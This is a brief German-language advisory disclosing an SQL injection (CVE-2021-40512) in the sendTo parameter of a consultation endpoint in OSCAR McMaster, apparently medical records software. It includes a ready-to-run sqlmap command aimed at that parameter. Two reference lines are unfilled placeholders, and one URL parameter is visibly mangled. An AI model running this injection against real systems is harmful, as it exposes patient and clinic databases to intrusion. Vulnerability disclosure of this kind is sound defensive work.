
CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability.
Eine SQL-Injection-Schwachstelle existiert in Version 19.40~1235 von OSCAR McMaster. Ein böswilliger Angreifer kann SQL-Befehle an die MySQL/MariaDB-Datenbank über den anfälligen sendTo-Parameter ausgeben, der sich auf dem Endpunkt /oscar/oscarEncounter/ViewConsultation.do befindet.
[Placeholder for cve.mitre]
[Placeholder for nist]
Anfällige JSP-Seite:
ViewConsultation.do - sendTo-Parameter
Anfälliger Payload:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie=<COOKIE> -p sendTo --banner
Entdeckt von Jack McBride, August 2021